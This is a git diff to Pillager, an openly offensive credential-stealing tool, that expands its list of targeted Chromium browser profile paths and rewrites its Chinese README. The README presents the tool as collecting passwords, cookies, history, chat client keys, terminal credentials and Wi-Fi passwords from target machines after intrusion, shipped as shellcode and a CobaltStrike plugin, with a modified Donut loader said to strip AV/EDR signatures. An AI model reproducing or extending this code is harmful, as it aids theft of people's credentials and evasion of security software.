diff --git a/Pillager/Browsers/Chrome.cs b/Pillager/Browsers/Chrome.cs index 04c4551..e3e9456 100644 --- a/Pillager/Browsers/Chrome.cs +++ b/Pillager/Browsers/Chrome.cs @@ -1,4 +1,5 @@ using System; +using System.Collections.Generic; using System.IO; using System.Security.Cryptography; using System.Text; @@ -14,6 +15,30 @@ namespace Pillager.Browsers public byte[] MasterKey { get; set; } + public static Dictionary browserOnChromium = new Dictionary + { + { "Chrome", "Google\\Chrome\\User Data" } , + { "Chrome Beta", "Google\\Chrome Beta\\User Data" } , + { "Chromium", "Chromium\\User Data" } , + { "Chrome SxS", "Google\\Chrome SxS\\User Data" }, + { "Edge", "Microsoft\\Edge\\User Data" } , + { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } , + { "QQBrowser", "Tencent\\QQBrowser\\User Data" } , + { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } , + { "Vivaldi", "Vivaldi\\User Data" } , + { "CocCoc", "CocCoc\\Browser\\User Data" }, + { "Torch", "Torch\\User Data" }, + { "Kometa", "Kometa\\User Data" }, + { "Orbitum", "Orbitum\\User Data" }, + { "CentBrowser", "CentBrowser\\User Data" }, + { "7Star", "7Star\\7Star\\User Data" }, + { "Sputnik", "Sputnik\\Sputnik\\User Data" }, + { "Epic Privacy Browser", "Epic Privacy Browser\\User Data" }, + { "Uran", "uCozMedia\\Uran\\User Data" }, + { "Yandex", "Yandex\\YandexBrowser\\User Data" }, + { "Iridium", "Iridium\\User Data" }, + }; + private string[] profiles = { "Default", "Profile 1", diff --git a/Pillager/Program.cs b/Pillager/Program.cs index ab5520d..dfc3a84 100644 --- a/Pillager/Program.cs +++ b/Pillager/Program.cs @@ -30,25 +30,12 @@ namespace Pillager //Browsers IE.Save(savepath); OldSogou.Save(savepath);//SogouExplorer < 12.x - FireFox.Save(savepath); - List> browserOnChromium = new List>() - { - new List() { "Chrome", "Google\\Chrome\\User Data" } , - new List() { "Chrome Beta", "Google\\Chrome Beta\\User Data" } , - new List() { "Chromium", "Chromium\\User Data" } , - new List() { "Edge", "Microsoft\\Edge\\User Data" } , - new List() { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } , - new List() { "QQBrowser", "Tencent\\QQBrowser\\User Data" } , - new List() { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } , - new List() { "Vivaldi", "Vivaldi\\User Data" } , - new List() { "CocCoc", "CocCoc\\Browser\\User Data" } - //new List() { "", "" } , - }; - foreach (List browser in browserOnChromium) + FireFox.Save(savepath); + foreach (var browser in Chrome.browserOnChromium) { string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), - browser[1]); - Chrome chrome = new Chrome(browser[0], chromepath); + browser.Value); + Chrome chrome = new Chrome(browser.Key, chromepath); chrome.Save(savepath); } diff --git a/README.md b/README.md index dd0dd87..a918363 100644 --- a/README.md +++ b/README.md @@ -4,11 +4,9 @@ ## 介绍 -这是一个敏感信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues +Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。 -在整理工具的过程中,发现目前的信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,于是自己在现有工具的基础上进行整理,得到了这款工具 - -目前支持: +## 支持 | Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings | | :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: | @@ -16,14 +14,26 @@ | Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | | Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | | Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | +| Chrome SxS | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | | Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| Brave-Browser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| SogouExplorer | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| Vivaldi | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | -| CocCoc | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | +| Brave-Browser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 | +| QQBrowser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 | +| SogouExplorer | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 | +| Vivaldi | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| CocCoc | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Torch | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Kometa | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Orbitum | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| CentBrowser | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| 7Star | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Sputnik | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Epic Privacy | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Uran | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | +| Yandex | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | | FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ | +注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持 + | IM | Support | | -------- | ------------------ | | QQ | ClientKey(Email) | @@ -34,14 +44,27 @@ | --------- | ------------------- | | MobaXterm | Password/Credential | +| Others | Support | +| ------ | -------- | +| Wifi | Password | + 后续将会陆续添加支持的软件 +## 使用方法 + +此项目使用Github Action自动编译打包,并上传至[Release](https://github.com/qwqdanchun/Pillager/releases),其中 + +* [Pillager.exe](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.exe) 为.Net Framework v3.5编译生成的exe +* [Pillager.bin](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.bin) Donut打包的raw格式的shellcode +* [cs-plugin.zip](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/cs-plugin.zip) 为适用于CobaltStrike使用的插件 + +使用CobaltStrike可以直接下载插件包,其他人推荐将shellcode集成至自己的加载器或工具中运行,不建议直接使用Pillager.exe + +执行后会将文件打包至 `%Temp%\Pillager.zip`,需要自行前往目录下载文件或修改代码将文件上传至他处 + ## 优点 -体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至 `%Temp%\Pillager.zip` - -## 编译 - -Release有Github Action自动编译的exe及shellcode,可以直接使用 - -为了方便使用,Release附带了cs插件版本,使用Pillager命令即可执行 +* 体积在100kb左右,为同类工具体积的几分之一甚至几十分之一 +* 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集 +* 长期维护,有问题可以及时的反馈处理 +* 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征